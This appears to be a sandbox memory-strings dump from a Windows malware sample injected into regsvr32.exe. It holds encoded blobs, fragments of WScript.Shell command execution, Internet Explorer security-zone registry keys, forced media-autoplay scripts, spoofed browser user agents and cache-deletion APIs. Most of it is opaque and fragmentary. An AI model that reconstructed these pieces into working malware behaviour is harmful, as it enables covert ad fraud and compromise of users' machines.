byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 
GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 
YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
UhwEB
Uhû
Uh'%C
Uh,
Uh1%D
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R 
byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 
GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 
YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD1
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666

regsvr32.exe_436_rwx_01000000_00005000:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration

regsvr32.exe_928_rwx_00080000_000C2000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
+=String.fromCharCode(parseInt(
.substr(
,2),16));
+=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;<=
!"#$%&'()*+,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
2 2*393
7:8?8[8`8
8$8(8,8084888
